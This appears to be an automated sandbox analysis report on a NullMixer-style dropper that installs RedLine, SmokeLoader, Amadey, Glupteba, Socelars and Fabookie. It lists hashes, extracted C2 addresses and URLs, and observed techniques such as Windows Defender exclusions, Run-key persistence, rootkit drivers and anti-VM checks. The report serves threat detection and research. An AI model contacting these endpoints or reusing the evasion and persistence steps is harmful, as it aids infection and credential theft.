amadey | f114cbd90381a13d1f7fee0ff09a52e238a4451da70191a2adeccbf84817c61a

Resubmissions

11-07-2023 07:32

230711-jc4rcagc6v 10

10-07-2023 13:04

230710-qa9yxabe2z 10

Analysis

max time kernel
145s
max time network
153s
platform
windows7_x64
resource
win7-20230703-en
resource tags

arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
submitted
10-07-2023 13:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup_x86_x64_install.exe
Size

14.1MB
MD5

aa581b1f07d2ab6bfff3134a307cec2e
SHA1

de449691f3489dd76b891434781b8753802eee14
SHA256

f114cbd90381a13d1f7fee0ff09a52e238a4451da70191a2adeccbf84817c61a
SHA512

b8553eecfa308ac4edbc90c565bfa01bef343ff2842f493e495672fabe11409c437fb07fce6296863b8e8363363a58638f900e6c4f3b06341913004f2f20277d
SSDEEP

196608:J+D/NGZ0gHyb1HMJPD/egwsjWIH4Aihj+avAs4Tt5Q9NCROf2s3Ak:JYNGLHs1wNw6WIHSvvApTyNCROf2s3Ak

Malware Config

Extracted

Family

socelars

http://www.wgqpw.com/

Extracted

Family

redline

Botnet

@Bob

185.215.113.44:23759

Attributes

auth_value
052aa6a199b3b3a78037547a0c15cdcf

Extracted

Family

smokeloader

Version

2020

http://rcacademy.at/upload/

http://e-lanpengeonline.com/upload/

http://vjcmvz.cn/upload/

http://galala.ru/upload/

http://witra.ru/upload/

rc4.i32

Extracted

Family

smokeloader

Botnet

pub5

Extracted

Family

redline

Botnet

media2test

65.108.69.168:16278

Attributes

auth_value
f78d521ba2c4812c35b2d33300976a4e

Extracted

Family

amadey

Version

2.85

185.215.113.35/d2VxjasuwS/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Fabookie payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02e68baa8dd93d.exe	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/976-483-0x0000000000400000-0x0000000002F41000-memory.dmp	family_glupteba
behavioral1/memory/976-486-0x0000000005160000-0x00000000059B0000-memory.dmp	family_glupteba

NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 9 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1032-209-0x0000000000400000-0x00000000006FE000-memory.dmp	family_redline
behavioral1/memory/1708-217-0x0000000000090000-0x00000000002B2000-memory.dmp	family_redline
behavioral1/memory/1032-258-0x0000000000400000-0x00000000006FE000-memory.dmp	family_redline
behavioral1/memory/2016-331-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/2016-332-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/2016-334-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/2016-345-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/2016-349-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/1708-526-0x0000000000090000-0x00000000002B2000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu020afc6240.exe	family_socelars

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

Thu024ca9649258.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	Thu024ca9649258.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	Thu024ca9649258.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	Thu024ca9649258.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	Thu024ca9649258.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Thu024ca9649258.exe = "0"	Thu024ca9649258.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	Thu024ca9649258.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	Thu024ca9649258.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

Thu027a65efa25b.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Thu027a65efa25b.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Thu027a65efa25b.exe

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
2920	bcdedit.exe
2980	bcdedit.exe
872	bcdedit.exe
300	bcdedit.exe
2600	bcdedit.exe
432	bcdedit.exe
2964	bcdedit.exe
1264	bcdedit.exe
1556	bcdedit.exe
2956	bcdedit.exe
2716	bcdedit.exe
2712	bcdedit.exe
2076	bcdedit.exe
1564	bcdedit.exe

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02e68baa8dd93d.exe	WebBrowserPassView

Nirsoft 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02e68baa8dd93d.exe	Nirsoft

Drops file in Drivers directory 1 IoCs

Processes:

csrss.exe

description ioc process

File created C:\Windows\system32\drivers\Winmon.sys csrss.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

2976 netsh.exe
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

description	ioc	process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

pid	process
2976	netsh.exe

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\7zS8E69216D\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\libcurlpp.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS8E69216D\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\libstdc++-6.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS8E69216D\libstdc++-6.dll	aspack_v212_v242

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Thu027a65efa25b.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Thu027a65efa25b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Thu027a65efa25b.exe

Executes dropped EXE 41 IoCs

Processes:

setup_installer.exesetup_install.exeThu02da05dae0713eb.exeThu029178728a4f78d0a.exeThu02da05dae0713eb.exeThu02aea30bc802ab68.exeThu0247db132a8b.exeThu0251b4c93ad7bbff.exeThu02acb863a216.exeThu027a65efa25b.exeThu024ca9649258.exeThu0234487e961.exeThu02f01df988c7.exeThu02d225322d4ec1.exeThu0254f37076fcd55fb.exeThu02e68baa8dd93d.exeThu02bbe7aaca36e.exeThu024bc696ba.exeThu02654d5746e2d67.exeThu023dd5e6f6cce12f9.exeThu020afc6240.exeThu024bc696ba.tmpThu0234487e961.tmpThu024bc696ba.exeThu024bc696ba.tmpHuYMRJYt.eXEThu02aea30bc802ab68.exeThu0254f37076fcd55fb.exeThu02f01df988c7.exeThu024ca9649258.exetkools.exetkools.execsrss.exepatch.exeinjector.exeThu02d225322d4ec1.exetkools.exedsefix.exetkools.exetkools.exetkools.exe

pid	process
1768	setup_installer.exe
1984	setup_install.exe
2800	Thu02da05dae0713eb.exe
584	Thu029178728a4f78d0a.exe
280	Thu02da05dae0713eb.exe
1940	Thu02aea30bc802ab68.exe
1884	Thu0247db132a8b.exe
1216	Thu0251b4c93ad7bbff.exe
900	Thu02acb863a216.exe
1032	Thu027a65efa25b.exe
976	Thu024ca9649258.exe
2824	Thu0234487e961.exe
904	Thu02f01df988c7.exe
1720	Thu02d225322d4ec1.exe
1544	Thu0254f37076fcd55fb.exe
2868	Thu02e68baa8dd93d.exe
2888	Thu02bbe7aaca36e.exe
920	Thu024bc696ba.exe
1708	Thu02654d5746e2d67.exe
2080	Thu023dd5e6f6cce12f9.exe
2076	Thu020afc6240.exe
2760	Thu024bc696ba.tmp
468	Thu0234487e961.tmp
972	Thu024bc696ba.exe
1616	Thu024bc696ba.tmp
2804	HuYMRJYt.eXE
2016	Thu02aea30bc802ab68.exe
748	Thu0254f37076fcd55fb.exe
628	Thu02f01df988c7.exe
2836	Thu024ca9649258.exe
2756	tkools.exe
1216	tkools.exe
2120	csrss.exe
1572	patch.exe
2576	injector.exe
2188	Thu02d225322d4ec1.exe
1612	tkools.exe
2344	dsefix.exe
1704	tkools.exe
1196	tkools.exe
3048	tkools.exe

Loads dropped DLL 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.exeThu02da05dae0713eb.execmd.exeThu02aea30bc802ab68.exeThu02da05dae0713eb.execmd.execmd.execmd.exeThu0247db132a8b.execmd.execmd.execmd.execmd.exeThu027a65efa25b.execmd.exeThu024ca9649258.exeThu02acb863a216.exeThu0251b4c93ad7bbff.exeThu0234487e961.execmd.exeThu0254f37076fcd55fb.exeThu02f01df988c7.execmd.execmd.execmd.exeThu02bbe7aaca36e.exeThu02d225322d4ec1.exe

pid	process
2400	setup_x86_x64_install.exe
1768	setup_installer.exe
1768	setup_installer.exe
1768	setup_installer.exe
1768	setup_installer.exe
1768	setup_installer.exe
1768	setup_installer.exe
1984	setup_install.exe
1984	setup_install.exe
1984	setup_install.exe
1984	setup_install.exe
1984	setup_install.exe
1984	setup_install.exe
1984	setup_install.exe
1984	setup_install.exe
2020	cmd.exe
2484	cmd.exe
2484	cmd.exe
2800	Thu02da05dae0713eb.exe
2800	Thu02da05dae0713eb.exe
2800	Thu02da05dae0713eb.exe
2700	cmd.exe
2700	cmd.exe
1940	Thu02aea30bc802ab68.exe
1940	Thu02aea30bc802ab68.exe
280	Thu02da05dae0713eb.exe
280	Thu02da05dae0713eb.exe
2724	cmd.exe
932	cmd.exe
932	cmd.exe
2548	cmd.exe
2548	cmd.exe
1884	Thu0247db132a8b.exe
1884	Thu0247db132a8b.exe
2404	cmd.exe
2568	cmd.exe
2568	cmd.exe
2516	cmd.exe
2680	cmd.exe
1032	Thu027a65efa25b.exe
1032	Thu027a65efa25b.exe
2528	cmd.exe
2528	cmd.exe
976	Thu024ca9649258.exe
976	Thu024ca9649258.exe
900	Thu02acb863a216.exe
900	Thu02acb863a216.exe
1216	Thu0251b4c93ad7bbff.exe
1216	Thu0251b4c93ad7bbff.exe
2824	Thu0234487e961.exe
2824	Thu0234487e961.exe
2992
2628	cmd.exe
2628	cmd.exe
1544	Thu0254f37076fcd55fb.exe
1544	Thu0254f37076fcd55fb.exe
904	Thu02f01df988c7.exe
904	Thu02f01df988c7.exe
2696	cmd.exe
2684	cmd.exe
536	cmd.exe
2888	Thu02bbe7aaca36e.exe
2888	Thu02bbe7aaca36e.exe
1720	Thu02d225322d4ec1.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

Thu024ca9649258.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	Thu024ca9649258.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	Thu024ca9649258.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Thu024ca9649258.exe = "0"	Thu024ca9649258.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	Thu024ca9649258.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	Thu024ca9649258.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	Thu024ca9649258.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	Thu024ca9649258.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Thu024ca9649258.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-264077997-199365141-898621884-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	Thu024ca9649258.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Thu027a65efa25b.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Thu027a65efa25b.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 ip-api.com
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMon csrss.exe
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Thu027a65efa25b.exe

flow	ioc
13	ip-api.com

description	ioc	process
File opened for modification	\??\WinMon	csrss.exe

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

Thu02aea30bc802ab68.exeThu02f01df988c7.exeThu0254f37076fcd55fb.exetkools.exeThu02d225322d4ec1.exetkools.exetkools.exe

description	pid	process	target process
PID 1940 set thread context of 2016	1940	Thu02aea30bc802ab68.exe	Thu02aea30bc802ab68.exe
PID 904 set thread context of 628	904	Thu02f01df988c7.exe	Thu02f01df988c7.exe
PID 1544 set thread context of 748	1544	Thu0254f37076fcd55fb.exe	Thu0254f37076fcd55fb.exe
PID 2756 set thread context of 1216	2756	tkools.exe	tkools.exe
PID 1720 set thread context of 2188	1720	Thu02d225322d4ec1.exe	Thu02d225322d4ec1.exe
PID 1612 set thread context of 1704	1612	tkools.exe	tkools.exe
PID 1196 set thread context of 3048	1196	tkools.exe	tkools.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

Thu024ca9649258.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN Thu024ca9649258.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	Thu024ca9649258.exe

Drops file in Program Files directory 3 IoCs

Processes:

Thu024bc696ba.tmp

description	ioc	process
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Thu024bc696ba.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-SRDFA.tmp	Thu024bc696ba.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Thu024bc696ba.tmp

Drops file in Windows directory 3 IoCs

Processes:

makecab.exeThu024ca9649258.exe

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20230710130526.cab	makecab.exe
File opened for modification	C:\Windows\rss	Thu024ca9649258.exe
File created	C:\Windows\rss\csrss.exe	Thu024ca9649258.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

520 2080 WerFault.exe Thu023dd5e6f6cce12f9.exe

pid	pid_target	process	target process
520	2080	WerFault.exe	Thu023dd5e6f6cce12f9.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

tkools.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tkools.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tkools.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tkools.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2356 schtasks.exe
536 schtasks.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2916 taskkill.exe
2508 taskkill.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-264077997-199365141-898621884-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

pid	process
2356	schtasks.exe
536	schtasks.exe

pid	process
2916	taskkill.exe
2508	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-264077997-199365141-898621884-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Thu024ca9649258.exenetsh.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	Thu024ca9649258.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	Thu024ca9649258.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	Thu024ca9649258.exe
